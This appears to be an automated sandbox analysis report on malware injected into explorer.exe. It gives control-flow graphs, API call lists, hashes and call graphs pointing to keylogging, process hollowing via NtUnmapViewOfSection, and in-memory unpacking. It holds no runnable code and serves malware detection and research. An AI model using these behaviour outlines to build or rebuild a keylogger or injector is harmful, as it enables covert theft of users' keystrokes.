                                                      control_flow_graph 379 812ae-812bf 380 812c5-812c7 379->380 381 813a6-813ad 379->381 380->381 382 812cd-812cf 380->382 383 812d4 call 829bd 382->383 384 812d9-812fc lstrlen call 82a09 383->384 387 8136e-81377 call 829eb 384->387 388 812fe-81327 call 82841 RtlZeroMemory 384->388 393 81379-8137d 387->393 394 8139d-813a5 call 829ae 387->394 395 81329-8134f RtlMoveMemory call 82569 388->395 396 81353-81369 RtlMoveMemory call 82569 388->396 397 8137f-81392 call 8255c PathMatchSpecA 393->397 394->381 395->388 405 81351 395->405 396->387 406 8139b 397->406 407 81394-81397 397->407 405->387 406->394 407->397 408 81399 407->408 408->394
                                                      APIs
                                                        • Part of subcall function 000829BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,000812D9,00000000,00000000,?,00000001), ref: 000829C7
                                                      • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 000812DC
                                                        • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                        • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                      • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0008138A
                                                        • Part of subcall function 00082841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,00081119,00000001), ref: 00082850
                                                        • Part of subcall function 00082841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,00081119,00000001), ref: 00082855
                                                      • RtlZeroMemory.NTDLL(00000000,00000104), ref: 00081316
                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00081332
                                                        • Part of subcall function 00082569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0008136E), ref: 00082591
                                                        • Part of subcall function 00082569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 0008259A
                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0008135F
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                      • String ID:
                                                      • API String ID: 2993730741-0
                                                      • Opcode ID: ebb8da3659380d077a57e1a160ee277981f50641c95accdbe0d8b302bb1cad2b
                                                      • Instruction ID: d5e7a5d4c6fba1c9ca2a6b0442937c699363d6c36e7367382e75030dee9f6b60
                                                      • Opcode Fuzzy Hash: ebb8da3659380d077a57e1a160ee277981f50641c95accdbe0d8b302bb1cad2b
                                                      • Instruction Fuzzy Hash: 5E219C707042129F8714FF2898558BEB7DEBF84B10B10092EF8D2D3242DB74DE0A8B62
                                                      Function 00081581 Relevance: 7.6, APIs: 5, Instructions: 66stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 409 81581-81592 411 81598-8159b 409->411 412 81624-81628 409->412 413 8159d-815a0 411->413 414 815a7-815b3 GlobalFix 411->414 413->414 415 815a2-815a5 413->415 416 81623 414->416 417 815b5-815b9 414->417 415->412 415->414 416->412 418 815e9 417->418 419 815bb-815be 417->419 420 815eb-815f2 call 8293e 418->420 421 815c0-815c3 419->421 422 815e4-815e7 419->422 424 815f4-815fd call 82724 420->424 421->424 425 815c5-815e2 lstrlenW call 82a09 lstrcatW 421->425 422->420 431 8161b-81622 GlobalUnWire 424->431 432 815ff-81608 lstrlenW 424->432 425->424 431->416 432->431 433 8160a-8160e 432->433 434 8160f call 816b9 433->434 435 81614-81616 call 829eb 434->435 435->431
                                                      APIs
                                                      • GlobalFix.KERNEL32(00000000), ref: 000815A9
                                                      • lstrlenW.KERNEL32(00000000), ref: 000815C6
                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 000815DC
                                                      • lstrlenW.KERNEL32(00000000), ref: 00081600
                                                      • GlobalUnWire.KERNEL32(00000000), ref: 0008161C
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Globallstrlen$Wirelstrcat
                                                      • String ID:
                                                      • API String ID: 2993198917-0
                                                      • Opcode ID: 5f6c21cff03faee5907282101b8d15d9eae0dc33675b0a2edceb466badea6a51
                                                      • Instruction ID: 788b0c73e6fd266604e91dee9fcfd0ea141b5d47a36d9ac5700182ba7bd2db02
                                                      • Opcode Fuzzy Hash: 5f6c21cff03faee5907282101b8d15d9eae0dc33675b0a2edceb466badea6a51
                                                      • Instruction Fuzzy Hash: D5010432A005119B96A577B9ACA85FE72EEFFC6B117080125F8C7E3212EE388D034750
                                                      Function 00081BBD Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 437 81bbd-81bd2 438 81bd4 437->438 439 81c06-81c0e 437->439 440 81bd6-81c04 RtlMoveMemory 438->440 441 81c69-81c71 439->441 442 81c10-81c15 439->442 440->439 440->440 444 81cb1 441->444 445 81c73-81c85 441->445 443 81c64-81c67 442->443 443->441 447 81c17-81c2a LoadLibraryA 443->447 446 81cb3-81cb8 444->446 445->444 448 81c87-81ca4 LdrProcessRelocationBlock 445->448 450 81cbb-81cbd 447->450 451 81c30-81c35 447->451 448->444 449 81ca6-81caa 448->449 449->444 452 81cac-81caf 449->452 450->446 453 81c5c-81c5f 451->453 452->444 452->448 454 81c61 453->454 455 81c37-81c3b 453->455 454->443 456 81c3d-81c40 455->456 457 81c42-81c45 455->457 458 81c47-81c51 GetProcAddress 456->458 457->458 458->450 459 81c53-81c59 458->459 459->453
                                                      APIs
                                                      • RtlMoveMemory.NTDLL(?,?,?), ref: 00081BF4
                                                      • LoadLibraryA.KERNEL32(?), ref: 00081C1C
                                                      • GetProcAddress.KERNEL32(00000000,-00000002,?,?,00000001,?,00000000), ref: 00081C49
                                                      • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00081C9A
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                      • String ID:
                                                      • API String ID: 3827878703-0
                                                      • Opcode ID: c883a228e3cd8c0f3b6ac679db0de883e7e7543f6decbc1dddab91cca32b2512
                                                      • Instruction ID: 882ca4903ef036f6b5f5890f1cff92f57d062729b07f76d901994030c3102d93
                                                      • Opcode Fuzzy Hash: c883a228e3cd8c0f3b6ac679db0de883e7e7543f6decbc1dddab91cca32b2512
                                                      • Instruction Fuzzy Hash: 8731AF71744616AFCB68DF29D885BA6B7ECBF15314F14412CE8C6C7200E736E846CBA0
                                                      Function 0008182D Relevance: 6.0, APIs: 4, Instructions: 42sleepstringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(0008582C), ref: 00081839
                                                      • lstrlenW.KERNEL32 ref: 00081845
                                                      • RtlLeaveCriticalSection.NTDLL(0008582C), ref: 000818A9
                                                      • Sleep.KERNEL32(00007530), ref: 000818B4
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                      • String ID:
                                                      • API String ID: 2134730579-0
                                                      • Opcode ID: 5cbea68060061c901a5a0e18475aadbda6a888a7652cd2638bdcb0b59724cb21
                                                      • Instruction ID: 7c053be448574412fdc363f5d5491aaf5b64503bb00f6c028054f82ac53ad905
                                                      • Opcode Fuzzy Hash: 5cbea68060061c901a5a0e18475aadbda6a888a7652cd2638bdcb0b59724cb21
                                                      • Instruction Fuzzy Hash: 9201DB70510900EBE314B765EC1A5BE3EA9FF817017100028F0C19B262DE388D01DFA6
                                                      Function 000826C9 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,000811DD), ref: 000826DB
                                                      • IsWow64Process.KERNEL32(000000FF,?), ref: 000826ED
                                                      • IsWow64Process.KERNEL32(00000000,?), ref: 00082700
                                                      • CloseHandle.KERNEL32(00000000), ref: 00082716
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Process$Wow64$CloseHandleOpen
                                                      • String ID:
                                                      • API String ID: 331459951-0
                                                      • Opcode ID: 79b6175c5be02008a79da4eab10be01ab7fd1a4829f266d8b305891cd8ccbd8b
                                                      • Instruction ID: 630fcc8948f4ad9a4a54ff0f26d7f5e2b88293ccb917313e272e05edaa6f4c2a
                                                      • Opcode Fuzzy Hash: 79b6175c5be02008a79da4eab10be01ab7fd1a4829f266d8b305891cd8ccbd8b
                                                      • Instruction Fuzzy Hash: D0F0BE72806218FFAB20DFA1AD888EEBBBCFF05751B10026AE94093140D7358F009BA1
                                                      Function 000817DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                        • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                      • GetLocalTime.KERNEL32(?,00000000), ref: 000817F3
                                                      • wsprintfW.USER32 ref: 0008181D
                                                      Strings
                                                      • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 00081817
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                      • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                      • API String ID: 377395780-613334611
                                                      • Opcode ID: 5b73c2eba3edcd7b7b3f1df71a82bd217a1d956ed1b7e119d7e59eb5ecba6627
                                                      • Instruction ID: 471151813494080dcc102fe0f31ea5f83efc4e699d331606ea4c247a43dc96ce
                                                      • Opcode Fuzzy Hash: 5b73c2eba3edcd7b7b3f1df71a82bd217a1d956ed1b7e119d7e59eb5ecba6627
                                                      • Instruction Fuzzy Hash: B4F03072900128BADB14ABD99C458FFB2FCFF0CB02B00018AFA81E1181F67C5A50D3B5

                                                      Execution Graph

                                                      Execution Coverage:9.4%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:19
                                                      Total number of Limit Nodes:3
                                                      execution_graph 910 6b2be 911 6b2c2 910->911 912 6b4a8 3 API calls 911->912 913 6b458 911->913 912->913 892 6b4a8 897 6b4ad 892->897 893 6b595 LoadLibraryA 893->897 895 6b5f0 VirtualProtect VirtualProtect 896 6b67e 895->896 896->896 897->893 897->895 898 6b5e5 897->898 899 6b358 900 6b35a 899->900 902 6b458 900->902 903 6b4a8 900->903 908 6b4ad 903->908 904 6b595 LoadLibraryA 904->908 906 6b5f0 VirtualProtect VirtualProtect 907 6b67e 906->907 907->907 908->904 908->906 909 6b5e5 908->909 909->902

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      callgraph 0 Function_0006B007 1 Function_00061D04 2 Function_00062A04 25 Function_00062918 2->25 44 Function_000627C4 2->44 66 Function_00061C6C 2->66 3 Function_00061405 4 Function_00062580 5 Function_00061F00 6 Function_00061000 7 Function_0006AD00 8 Function_0006A881 9 Function_0006428F 10 Function_0006370C 10->10 32 Function_000631AC 10->32 42 Function_00061838 10->42 43 Function_000634C4 10->43 10->66 11 Function_0006188C 11->42 12 Function_00061F0C 13 Function_0006AC8D 14 Function_00061508 15 Function_00061A88 16 Function_00063394 16->15 21 Function_00061E9C 16->21 16->42 55 Function_000618D0 16->55 63 Function_00061860 16->63 70 Function_000618E8 16->70 80 Function_00061EF8 16->80 17 Function_00062D14 20 Function_00061E1C 17->20 40 Function_000624B8 17->40 17->42 17->63 17->70 18 Function_00061B10 19 Function_0006B291 20->42 22 Function_0006AB9C 23 Function_0006141D 24 Function_00064298 26 Function_00061D24 27 Function_00061822 28 Function_000627A0 29 Function_00061CAC 30 Function_000620AC 30->15 31 Function_00062E2C 31->11 45 Function_00062DC0 31->45 31->63 32->18 33 Function_000625A8 32->33 32->42 53 Function_00061D54 32->53 32->63 79 Function_000626F8 32->79 33->4 33->55 69 Function_00062768 33->69 34 Function_0006B4A8 68 Function_0006B46A 34->68 35 Function_000614B2 36 Function_0006AAB0 37 Function_0006B2BE 37->34 38 Function_000619BC 39 Function_00062FBC 39->31 40->42 40->63 75 Function_000620F4 40->75 41 Function_00061938 41->42 41->63 43->1 43->2 43->15 43->16 43->26 43->29 43->38 43->42 47 Function_00061C4C 43->47 43->63 43->66 77 Function_00061BF8 43->77 45->42 46 Function_0006ABCF 48 Function_0006C14A 49 Function_0006B148 50 Function_0006ABD7 51 Function_00061254 52 Function_000614D4 54 Function_0006AAD2 56 Function_0006B2DF 57 Function_00061FDC 57->42 78 Function_000618F8 57->78 58 Function_0006B15B 59 Function_00063158 60 Function_0006B358 60->34 61 Function_00062664 62 Function_0006AFE3 63->66 64 Function_00061560 65 Function_0006156C 67 Function_0006ADEA 69->28 71 Function_00063068 71->31 71->41 71->42 71->63 71->66 72 Function_0006A8E8 73 Function_00061576 74 Function_0006AFF6 75->11 75->12 75->30 75->38 75->42 75->55 75->57 75->63 75->78 76 Function_00061EFA 79->4 79->61 79->66 81 Function_000614F9 82 Function_00065579

                                                      Executed Functions

                                                      Function 0006370C Relevance: 1.6, APIs: 1, Instructions: 75nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 116 6370c-6371c call 61c6c 119 63722-63754 call 61838 116->119 120 637b0-637b5 116->120 124 63756-6375b call 61838 119->124 125 63785-637aa NtUnmapViewOfSection 119->125 127 63760-63779 124->127 129 637bc-637cb call 634c4 125->129 130 637ac-637ae 125->130 127->125 136 637d5-637de 129->136 137 637cd-637d0 call 6370c 129->137 130->120 131 637b6-637bb call 631ac 130->131 131->129 137->136
                                                      APIs
                                                      • NtUnmapViewOfSection.NTDLL ref: 0006378C
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.628321277.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: SectionUnmapView
                                                      • String ID:
                                                      • API String ID: 498011366-0
                                                      • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                      • Instruction ID: 6f86dcd5657ea9ef3a129f1321056eeef28fe10e10ecd7700be2daa8a1f1615e
                                                      • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                      • Instruction Fuzzy Hash: 9611C8746069094FFB6CFBB8989D3B533D3FB14312F544029E815C72A2DE398A818740
                                                      Function 0006B4A8 Relevance: 4.8, APIs: 3, Instructions: 252memorylibraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 6b4a8-6b4ab 1 6b4b5-6b4b9 0->1 2 6b4c5 1->2 3 6b4bb-6b4c3 1->3 4 6b4c7 2->4 5 6b4ad-6b4b3 2->5 3->2 6 6b4ca-6b4d1 4->6 5->1 8 6b4d3-6b4db 6->8 9 6b4dd 6->9 8->9 9->6 10 6b4df-6b4e2 9->10 11 6b4f7-6b504 10->11 12 6b4e4-6b4f2 10->12 22 6b506-6b508 11->22 23 6b51e-6b52c call 6b46a 11->23 13 6b4f4-6b4f5 12->13 14 6b52e-6b549 12->14 13->11 15 6b57a-6b57d 14->15 17 6b582-6b589 15->17 18 6b57f-6b580 15->18 21 6b58f-6b593 17->21 20 6b561-6b565 18->20 24 6b567-6b56a 20->24 25 6b54b-6b54e 20->25 26 6b595-6b5ae LoadLibraryA 21->26 27 6b5f0-6b5f9 21->27 30 6b50b-6b512 22->30 23->1 24->17 31 6b56c-6b570 24->31 25->17 29 6b550 25->29 28 6b5af-6b5b6 26->28 32 6b5fc-6b605 27->32 28->21 35 6b5b8 28->35 36 6b551-6b555 29->36 50 6b514-6b51a 30->50 51 6b51c 30->51 31->36 37 6b572-6b579 31->37 38 6b607-6b609 32->38 39 6b62a-6b67a VirtualProtect * 2 32->39 40 6b5c4-6b5cc 35->40 41 6b5ba-6b5c2 35->41 36->20 42 6b557-6b559 36->42 37->15 44 6b61c-6b628 38->44 45 6b60b-6b61a 38->45 46 6b67e-6b683 39->46 48 6b5ce-6b5da 40->48 41->48 42->20 49 6b55b-6b55f 42->49 44->45 45->32 46->46 47 6b685-6b694 46->47 54 6b5e5-6b5ef 48->54 55 6b5dc-6b5e3 48->55 49->20 49->24 50->51 51->23 51->30 55->28
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,7473604B), ref: 0006B5A7
                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006B651
                                                      • VirtualProtect.KERNELBASE ref: 0006B66F
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.628321277.000000000006A000.00000040.80000000.00040000.00000000.sdmp, Offset: 0006A000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_6a000_explorer.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 895956442-0
                                                      • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                      • Instruction ID: de7da5a6e30cfdee21bae1f1aab1ff707d31be70e42097908793e0bf60735bc1
                                                      • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                      • Instruction Fuzzy Hash: C1514772758D1D4BCB24AA7C9C843F8B7D3FB55325B58062AD49BC3285EB58C9C68381
                                                      Function 000634C4 Relevance: 3.2, APIs: 2, Instructions: 195COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 56 634c4-63527 call 61838 * 2 62 6352b-63541 call 61bf8 56->62 65 63547-6355c call 61a88 62->65 66 636fc-63707 SleepEx 62->66 69 63562-63580 call 61a88 65->69 70 636ec-636f7 call 61c4c 65->70 66->62 69->70 74 63586-6358b 69->74 70->66 74->70 75 63591-635c4 call 61838 74->75 80 636e4-636e7 call 61860 75->80 81 635ca-635e0 75->81 80->70 84 636d3-636d5 81->84 85 635e5-635fa 84->85 86 636db-636dc 84->86 88 636c5-636cb 85->88 89 63600-63614 85->89 86->80 88->84 89->88 91 6361a-63629 call 63394 89->91 91->88 94 6362f-63638 call 61cac 91->94 94->88 97 6363e-63647 call 61d04 94->97 97->88 100 63649-63650 call 61d24 97->100 100->88 103 63652-63660 call 61c6c 100->103 103->88 106 63662-636c0 call 619bc call 62a04 call 619bc 103->106 106->88
                                                      APIs
                                                        • Part of subcall function 00061BF8: OpenFileMappingA.KERNEL32 ref: 00061C0F
                                                        • Part of subcall function 00061BF8: MapViewOfFile.KERNEL32 ref: 00061C2E
                                                      • SysFreeMap.PGOCR ref: 000636F7
                                                      • SleepEx.KERNEL32 ref: 00063701
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.628321277.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$FreeMappingOpenSleepView
                                                      • String ID:
                                                      • API String ID: 4205437007-0
                                                      • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                      • Instruction ID: e861ec5d46096bab29741ff2dd44a154c76200efb4f374e95dae1c26c01eb10d
                                                      • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                      • Instruction Fuzzy Hash: 68517730218A089FDB59FF68D8996EA73E3EB94310F444619F45BC72A2DF78DA0587C1
                                                      Function 00061BF8 Relevance: 3.0, APIs: 2, Instructions: 40fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 113 61bf8-61c18 OpenFileMappingA 114 61c1a-61c38 MapViewOfFile 113->114 115 61c3b-61c48 113->115 114->115
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.628321277.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$MappingOpenView
                                                      • String ID:
                                                      • API String ID: 3439327939-0
                                                      • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                      • Instruction ID: 3bcaf25acfd1f49024d9787d5b89c15f37bef9fb8d047487d34edab0d4ccc7e8
                                                      • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                      • Instruction Fuzzy Hash: 0FF01234314F4D4FEB45EF7C9C9C135B7E1EBA8202744857A985AC6165EF34C8458711